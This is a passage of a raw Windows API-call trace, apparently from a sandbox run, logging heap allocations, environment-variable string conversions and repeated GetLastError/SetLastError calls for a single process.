[0070.541] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a14d0) returned 0xc [0070.541] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a14d0, Size=0x10) returned 0x6a14d0 [0070.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0070.541] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x3c) returned 0x695548 [0070.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x695548, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0070.541] GetLastError () returned 0x0 [0070.541] SetLastError (dwErrCode=0x0) [0070.541] GetLastError () returned 0x0 [0070.541] SetLastError (dwErrCode=0x0) [0070.541] GetLastError () returned 0x0 [0070.541] SetLastError (dwErrCode=0x0) [0070.541] GetLastError () returned 0x0 [0070.542] SetLastError (dwErrCode=0x0) [0070.542] GetLastError () returned 0x0 [0070.542] SetLastError (dwErrCode=0x0) [0070.542] GetLastError () returned 0x0 [0070.542] SetLastError (dwErrCode=0x0) [0070.542] GetLastError () returned 0x0 [0070.542] SetLastError (dwErrCode=0x0) [0070.542] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a14d0) returned 0x10 [0070.542] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a14d0, Size=0x14) returned 0x6a1528 [0070.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0070.542] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x31) returned 0x6a1548 [0070.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x6a1548, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0070.542] GetLastError () returned 0x0 [0070.544] SetLastError (dwErrCode=0x0) [0070.544] GetLastError () returned 0x0 [0070.544] SetLastError (dwErrCode=0x0) [0070.544] GetLastError () returned 0x0 [0070.544] SetLastError (dwErrCode=0x0) [0070.544] GetLastError () returned 0x0 [0070.544] SetLastError (dwErrCode=0x0) [0070.545] GetLastError () returned 0x0 [0070.545] SetLastError (dwErrCode=0x0) [0070.545] GetLastError () returned 0x0 [0070.545] SetLastError (dwErrCode=0x0) [0070.545] GetLastError () returned 0x0 [0070.545] SetLastError (dwErrCode=0x0) [0070.545] GetLastError () returned 0x0 [0070.545] SetLastError (dwErrCode=0x0) [0070.545] GetLastError () returned 0x0 [0070.545] SetLastError (dwErrCode=0x0) [0070.545] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a1528) returned 0x14 [0070.545] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a1528, Size=0x18) returned 0x6a1528 [0070.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0070.545] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x17) returned 0x6a1588 [0070.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x6a1588, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0070.545] GetLastError () returned 0x0 [0070.545] SetLastError (dwErrCode=0x0) [0070.545] GetLastError () returned 0x0 [0070.545] SetLastError (dwErrCode=0x0) [0070.546] GetLastError () returned 0x0 [0070.546] SetLastError (dwErrCode=0x0) [0070.546] GetLastError () returned 0x0 [0070.546] SetLastError (dwErrCode=0x0) [0070.546] GetLastError () returned 0x0 [0070.546] SetLastError (dwErrCode=0x0) [0070.546] GetLastError () returned 0x0 [0070.546] SetLastError (dwErrCode=0x0) [0070.546] GetLastError () returned 0x0 [0070.546] SetLastError (dwErrCode=0x0) [0070.546] GetLastError () returned 0x0 [0070.546] SetLastError (dwErrCode=0x0) [0070.546] GetLastError () returned 0x0 [0070.546] SetLastError (dwErrCode=0x0) [0070.546] GetLastError () returned 0x0 [0070.546] SetLastError (dwErrCode=0x0) [0070.546] GetLastError () returned 0x0 [0070.546] SetLastError (dwErrCode=0x0) [0070.546] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a1528) returned 0x18 [0070.546] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a1528, Size=0x1c) returned 0x6a15a8 [0070.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0070.546] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x24) returned 0x69a7f0 [0070.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x69a7f0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0070.547] GetLastError () returned 0x0 [0070.547] SetLastError (dwErrCode=0x0) [0070.547] GetLastError () returned 0x0 [0070.547] SetLastError (dwErrCode=0x0) [0070.547] GetLastError () returned 0x0 [0070.547] SetLastError (dwErrCode=0x0) [0070.547] GetLastError () returned 0x0 [0070.547] SetLastError (dwErrCode=0x0) [0070.547] GetLastError () returned 0x0 [0070.547] SetLastError (dwErrCode=0x0) [0070.547] GetLastError () returned 0x0 [0070.547] SetLastError (dwErrCode=0x0) [0070.547] GetLastError () returned 0x0 [0070.547] SetLastError (dwErrCode=0x0) [0070.548] GetLastError () returned 0x0 [0070.548] SetLastError (dwErrCode=0x0) [0070.548] GetLastError () returned 0x0 [0070.548] SetLastError (dwErrCode=0x0) [0070.548] GetLastError () returned 0x0 [0070.548] SetLastError (dwErrCode=0x0) [0070.548] GetLastError () returned 0x0 [0070.548] SetLastError (dwErrCode=0x0) [0070.548] GetLastError () returned 0x0 [0070.548] SetLastError (dwErrCode=0x0) [0070.548] GetLastError () returned 0x0 [0070.548] SetLastError (dwErrCode=0x0) [0070.548] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a15a8) returned 0x1c [0070.548] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a15a8, Size=0x20) returned 0x6a15a8 [0070.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0070.548] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x14) returned 0x6a1528 [0070.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x6a1528, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0070.548] GetLastError () returned 0x0 [0070.548] SetLastError (dwErrCode=0x0) [0070.548] GetLastError () returned 0x0 [0070.548] SetLastError (dwErrCode=0x0) [0070.548] GetLastError () returned 0x0 [0070.548] SetLastError (dwErrCode=0x0) [0070.549] GetLastError () returned 0x0 [0070.549] SetLastError (dwErrCode=0x0) [0070.549] GetLastError () returned 0x0 [0070.549] SetLastError (dwErrCode=0x0) [0070.549] GetLastError () returned 0x0 [0070.549] SetLastError (dwErrCode=0x0) [0070.549] GetLastError () returned 0x0 [0070.549] SetLastError (dwErrCode=0x0) [0070.549] GetLastError () returned 0x0 [0070.549] SetLastError (dwErrCode=0x0) [0070.549] GetLastError () returned 0x0 [0070.549] SetLastError (dwErrCode=0x0) [0070.549] GetLastError () returned 0x0 [0070.549] SetLastError (dwErrCode=0x0) [0070.549] GetLastError () returned 0x0 [0070.549] SetLastError (dwErrCode=0x0) [0070.549] GetLastError () returned 0x0 [0070.549] SetLastError (dwErrCode=0x0) [0070.550] GetLastError () returned 0x0 [0070.550] SetLastError (dwErrCode=0x0) [0070.550] GetLastError () returned 0x0 [0070.550] SetLastError (dwErrCode=0x0) [0070.550] GetLastError () returned 0x0 [0070.550] SetLastError (dwErrCode=0x0) [0070.550] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a15a8) returned 0x20 [0070.550] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a15a8, Size=0x24) returned 0x6a15a8 [0070.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0070.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xd) returned 0x69e4f0 [0070.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x69e4f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0070.550] GetLastError () returned 0x0 [0070.550] SetLastError (dwErrCode=0x0) [0070.550] GetLastError () returned 0x0 [0070.550] SetLastError (dwErrCode=0x0) [0070.550] GetLastError () returned 0x0 [0070.550] SetLastError (dwErrCode=0x0) [0070.550] GetLastError () returned 0x0 [0070.550] SetLastError (dwErrCode=0x0) [0070.550] GetLastError () returned 0x0 [0070.551] SetLastError (dwErrCode=0x0) [0070.551] GetLastError () returned 0x0 [0070.551] SetLastError (dwErrCode=0x0) [0070.551] GetLastError () returned 0x0 [0070.551] SetLastError (dwErrCode=0x0) [0070.551] GetLastError () returned 0x0 [0070.551] SetLastError (dwErrCode=0x0) [0070.551] GetLastError () returned 0x0 [0070.551] SetLastError (dwErrCode=0x0) [0070.551] GetLastError () returned 0x0 [0070.551] SetLastError (dwErrCode=0x0) [0070.551] GetLastError () returned 0x0 [0070.551] SetLastError (dwErrCode=0x0) [0070.551] GetLastError () returned 0x0 [0070.551] SetLastError (dwErrCode=0x0) [0070.551] GetLastError () returned 0x0 [0070.551] SetLastError (dwErrCode=0x0) [0070.551] GetLastError () returned 0x0 [0070.551] SetLastError (dwErrCode=0x0) [0070.551] GetLastError () returned 0x0 [0070.552] SetLastError (dwErrCode=0x0) [0070.552] GetLastError () returned 0x0 [0070.552] SetLastError (dwErrCode=0x0) [0070.552] GetLastError () returned 0x0 [0070.552] SetLastError (dwErrCode=0x0) [0070.552] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a15a8) returned 0x24 [0070.552] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a15a8, Size=0x28) returned 0x6a15a8 [0070.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0070.552] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x25) returned 0x69a820 [0070.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x69a820, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0070.552] GetLastError () returned 0x0 [0070.552] SetLastError (dwErrCode=0x0) [0070.552] GetLastError () returned 0x0 [0070.552] SetLastError (dwErrCode=0x0) [0070.552] GetLastError () returned 0x0 [0070.552] SetLastError (dwErrCode=0x0) [0070.552] GetLastError () returned 0x0 [0070.553] SetLastError (dwErrCode=0x0) [0070.553] GetLastError () returned 0x0 [0070.553] SetLastError (dwErrCode=0x0) [0070.553] GetLastError () returned 0x0 [0070.553] SetLastError (dwErrCode=0x0) [0070.553] GetLastError () returned 0x0 [0070.553] SetLastError (dwErrCode=0x0) [0070.553] GetLastError () returned 0x0 [0070.553] SetLastError (dwErrCode=0x0) [0070.553] GetLastError () returned 0x0 [0070.553] SetLastError (dwErrCode=0x0) [0070.553] GetLastError () returned 0x0 [0070.553] SetLastError (dwErrCode=0x0) [0070.553] GetLastError () returned 0x0 [0070.554] SetLastError (dwErrCode=0x0) [0070.554] GetLastError () returned 0x0 [0070.554] SetLastError (dwErrCode=0x0) [0070.554] GetLastError () returned 0x0 [0070.554] SetLastError (dwErrCode=0x0) [0070.554] GetLastError () returned 0x0 [0070.554] SetLastError (dwErrCode=0x0) [0070.554] GetLastError () returned 0x0 [0070.554] SetLastError (dwErrCode=0x0) [0070.554] GetLastError () returned 0x0 [0070.554] SetLastError (dwErrCode=0x0) [0070.554] GetLastError () returned 0x0 [0070.554] SetLastError (dwErrCode=0x0) [0070.554] GetLastError () returned 0x0 [0070.554] SetLastError (dwErrCode=0x0) [0070.554] GetLastError () returned 0x0 [0070.554] SetLastError (dwErrCode=0x0) [0070.554] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a15a8) returned 0x28 [0070.554] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a15a8, Size=0x2c) returned 0x6a15a8 [0070.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0070.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x39) returned 0x695590 [0070.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x695590, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0070.555] GetLastError () returned 0x0 [0070.555] SetLastError (dwErrCode=0x0) [0070.555] GetLastError () returned 0x0 [0070.555] SetLastError (dwErrCode=0x0) [0070.555] GetLastError () returned 0x0 [0070.555] SetLastError (dwErrCode=0x0) [0070.555] GetLastError () returned 0x0 [0070.555] SetLastError (dwErrCode=0x0) [0070.555] GetLastError () returned 0x0 [0070.555] SetLastError (dwErrCode=0x0) [0070.555] GetLastError () returned 0x0 [0070.555] SetLastError (dwErrCode=0x0) [0070.555] GetLastError () returned 0x0 [0070.555] SetLastError (dwErrCode=0x0) [0070.555] GetLastError () returned 0x0 [0070.555] SetLastError (dwErrCode=0x0) [0070.555] GetLastError () returned 0x0 [0070.556] SetLastError (dwErrCode=0x0) [0070.556] GetLastError () returned 0x0 [0070.556] SetLastError (dwErrCode=0x0) [0070.556] GetLastError () returned 0x0 [0070.556] SetLastError (dwErrCode=0x0) [0070.556] GetLastError () returned 0x0 [0070.556] SetLastError (dwErrCode=0x0) [0070.556] GetLastError () returned 0x0 [0070.556] SetLastError (dwErrCode=0x0) [0070.556] GetLastError () returned 0x0 [0070.556] SetLastError (dwErrCode=0x0) [0070.556] GetLastError () returned 0x0 [0070.556] SetLastError (dwErrCode=0x0) [0070.556] GetLastError () returned 0x0 [0070.556] SetLastError (dwErrCode=0x0) [0070.556] GetLastError () returned 0x0 [0070.556] SetLastError (dwErrCode=0x0) [0070.556] GetLastError () returned 0x0 [0070.556] SetLastError (dwErrCode=0x0) [0070.557] GetLastError () returned 0x0 [0070.557] SetLastError (dwErrCode=0x0) [0070.557] GetLastError () returned 0x0 [0070.557] SetLastError (dwErrCode=0x0) [0070.557] GetLastError () returned 0x0 [0070.557] SetLastError (dwErrCode=0x0) [0070.557] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a15a8) returned 0x2c [0070.557] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a15a8, Size=0x30) returned 0x6a15a8 [0070.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0070.557] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x18) returned 0x6a15e0 [0070.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x6a15e0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0070.557] GetLastError () returned 0x0 [0070.557] SetLastError (dwErrCode=0x0) [0070.557] GetLastError () returned 0x0 [0070.557] SetLastError (dwErrCode=0x0) [0070.557] GetLastError () returned 0x0 [0070.558] SetLastError (dwErrCode=0x0) [0070.558] GetLastError () returned 0x0 [0070.558] SetLastError (dwErrCode=0x0) [0070.558] GetLastError () returned 0x0 [0070.558] SetLastError (dwErrCode=0x0) [0070.558] GetLastError () returned 0x0 [0070.558] SetLastError (dwErrCode=0x0) [0070.558] GetLastError () returned 0x0 [0070.558] SetLastError (dwErrCode=0x0) [0070.558] GetLastError () returned 0x0 [0070.558] SetLastError (dwErrCode=0x0) [0070.558] GetLastError () returned 0x0 [0070.558] SetLastError (dwErrCode=0x0) [0070.558] GetLastError () returned 0x0 [0070.558] SetLastError (dwErrCode=0x0) [0070.558] GetLastError () returned 0x0 [0070.558] SetLastError (dwErrCode=0x0) [0070.558] GetLastError () returned 0x0 [0070.559] SetLastError (dwErrCode=0x0) [0070.559] GetLastError () returned 0x0 [0070.559] SetLastError (dwErrCode=0x0) [0070.559] GetLastError () returned 0x0 [0070.559] SetLastError (dwErrCode=0x0) [0070.559] GetLastError () returned 0x0 [0070.559] SetLastError (dwErrCode=0x0) [0070.559] GetLastError () returned 0x0 [0070.559] SetLastError (dwErrCode=0x0) [0070.559] GetLastError () returned 0x0 [0070.559] SetLastError (dwErrCode=0x0) [0070.559] GetLastError () returned 0x0 [0070.559] SetLastError (dwErrCode=0x0) [0070.559] GetLastError () returned 0x0 [0070.559] SetLastError (dwErrCode=0x0) [0070.559] GetLastError () returned 0x0 [0070.559] SetLastError (dwErrCode=0x0) [0070.559] GetLastError () returned 0x0 [0070.560] SetLastError (dwErrCode=0x0) [0070.560] GetLastError () returned 0x0 [0070.560] SetLastError (dwErrCode=0x0) [0070.560] GetLastError () returned 0x0 [0070.560] SetLastError (dwErrCode=0x0) [0070.560] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a15a8) returned 0x30 [0070.560] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a15a8, Size=0x34) returned 0x6a1600 [0070.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0070.560] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x17) returned 0x6a15a8 [0070.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x6a15a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0070.560] GetLastError () returned 0x0 [0070.560] SetLastError (dwErrCode=0x0) [0070.560] GetLastError () returned 0x0 [0070.560] SetLastError (dwErrCode=0x0) [0070.560] GetLastError () returned 0x0 [0070.560] SetLastError (dwErrCode=0x0) [0070.560] GetLastError () returned 0x0 [0070.561] SetLastError (dwErrCode=0x0) [0070.561] GetLastError () returned 0x0 [0070.561] SetLastError (dwErrCode=0x0) [0070.561] GetLastError () returned 0x0 [0070.561] SetLastError (dwErrCode=0x0) [0070.561] GetLastError () returned 0x0 [0070.561] SetLastError (dwErrCode=0x0) [0070.561] GetLastError () returned 0x0 [0070.561] SetLastError (dwErrCode=0x0) [0070.561] GetLastError () returned 0x0 [0070.561] SetLastError (dwErrCode=0x0) [0070.561] GetLastError () returned 0x0 [0070.561] SetLastError (dwErrCode=0x0) [0070.561] GetLastError () returned 0x0 [0070.561] SetLastError (dwErrCode=0x0) [0070.561] GetLastError () returned 0x0 [0070.561] SetLastError (dwErrCode=0x0) [0070.561] GetLastError () returned 0x0 [0070.562] SetLastError (dwErrCode=0x0) [0070.562] GetLastError () returned 0x0 [0070.562] SetLastError (dwErrCode=0x0) [0070.562] GetLastError () returned 0x0 [0070.562] SetLastError (dwErrCode=0x0) [0070.562] GetLastError () returned 0x0 [0070.562] SetLastError (dwErrCode=0x0) [0070.562] GetLastError () returned 0x0 [0070.562] SetLastError (dwErrCode=0x0) [0070.562] GetLastError () returned 0x0 [0070.562] SetLastError (dwErrCode=0x0) [0070.562] GetLastError () returned 0x0 [0070.562] SetLastError (dwErrCode=0x0) [0070.562] GetLastError () returned 0x0 [0070.562] SetLastError (dwErrCode=0x0) [0070.562] GetLastError () returned 0x0 [0070.562] SetLastError (dwErrCode=0x0) [0070.562] GetLastError () returned 0x0 [0070.563] SetLastError (dwErrCode=0x0) [0070.563] GetLastError () returned 0x0 [0070.563] SetLastError (dwErrCode=0x0) [0070.563] GetLastError () returned 0x0 [0070.563] SetLastError (dwErrCode=0x0) [0070.563] GetLastError () returned 0x0 [0070.564] SetLastError (dwErrCode=0x0) [0070.564] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a1600) returned 0x34 [0070.564] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a1600, Size=0x38) returned 0x6a1600 [0070.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0070.564] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xe) returned 0x69e508 [0070.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x69e508, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0070.564] GetLastError () returned 0x0 [0070.564] SetLastError (dwErrCode=0x0) [0070.564] GetLastError () returned 0x0 [0070.564] SetLastError (dwErrCode=0x0) [0070.564] GetLastError () returned 0x0 [0070.564] SetLastError (dwErrCode=0x0) [0070.564] GetLastError () returned 0x0 [0070.564] SetLastError (dwErrCode=0x0) [0070.564] GetLastError () returned 0x0 [0070.564] SetLastError (dwErrCode=0x0) [0070.564] GetLastError () returned 0x0 [0070.564] SetLastError (dwErrCode=0x0) [0070.564] GetLastError () returned 0x0 [0070.564] SetLastError (dwErrCode=0x0) [0070.564] GetLastError () returned 0x0 [0070.564] SetLastError (dwErrCode=0x0) [0070.565] GetLastError () returned 0x0 [0070.565] SetLastError (dwErrCode=0x0) [0070.565] GetLastError () returned 0x0 [0070.565] SetLastError (dwErrCode=0x0) [0070.565] GetLastError () returned 0x0 [0070.565] SetLastError (dwErrCode=0x0) [0070.565] GetLastError () returned 0x0 [0070.565] SetLastError (dwErrCode=0x0) [0070.565] GetLastError () returned 0x0 [0070.565] SetLastError (dwErrCode=0x0) [0070.565] GetLastError () returned 0x0 [0070.565] SetLastError (dwErrCode=0x0) [0070.565] GetLastError () returned 0x0 [0070.565] SetLastError (dwErrCode=0x0) [0070.565] GetLastError () returned 0x0 [0070.565] SetLastError (dwErrCode=0x0) [0070.565] GetLastError () returned 0x0 [0070.565] SetLastError (dwErrCode=0x0) [0070.565] GetLastError () returned 0x0 [0070.566] SetLastError (dwErrCode=0x0) [0070.566] GetLastError () returned 0x0 [0070.566] SetLastError (dwErrCode=0x0) [0070.566] GetLastError () returned 0x0 [0070.566] SetLastError (dwErrCode=0x0) [0070.566] GetLastError () returned 0x0 [0070.566] SetLastError (dwErrCode=0x0) [0070.566] GetLastError () returned 0x0 [0070.566] SetLastError (dwErrCode=0x0) [0070.566] GetLastError () returned 0x0 [0070.566] SetLastError (dwErrCode=0x0) [0070.566] GetLastError () returned 0x0 [0070.566] SetLastError (dwErrCode=0x0) [0070.566] GetLastError () returned 0x0 [0070.566] SetLastError (dwErrCode=0x0) [0070.566] GetLastError () returned 0x0 [0070.566] SetLastError (dwErrCode=0x0) [0070.566] GetLastError () returned 0x0 [0070.566] SetLastError (dwErrCode=0x0) [0070.566] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a1600) returned 0x38 [0070.566] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a1600, Size=0x3c) returned 0x6a1600 [0070.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0070.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x69) returned 0x6a1648 [0070.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x6a1648, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0070.567] GetLastError () returned 0x0 [0070.567] SetLastError (dwErrCode=0x0) [0070.567] GetLastError () returned 0x0 [0070.567] SetLastError (dwErrCode=0x0) [0070.567] GetLastError () returned 0x0 [0070.567] SetLastError (dwErrCode=0x0) [0070.567] GetLastError () returned 0x0 [0070.567] SetLastError (dwErrCode=0x0) [0070.567] GetLastError () returned 0x0 [0070.567] SetLastError (dwErrCode=0x0) [0070.567] GetLastError () returned 0x0 [0070.567] SetLastError (dwErrCode=0x0) [0070.567] GetLastError () returned 0x0 [0070.567] SetLastError (dwErrCode=0x0) [0070.567] GetLastError () returned 0x0 [0070.568] SetLastError (dwErrCode=0x0) [0070.568] GetLastError () returned 0x0 [0070.568] SetLastError (dwErrCode=0x0) [0070.568] GetLastError () returned 0x0 [0070.568] SetLastError (dwErrCode=0x0) [0070.568] GetLastError () returned 0x0 [0070.568] SetLastError 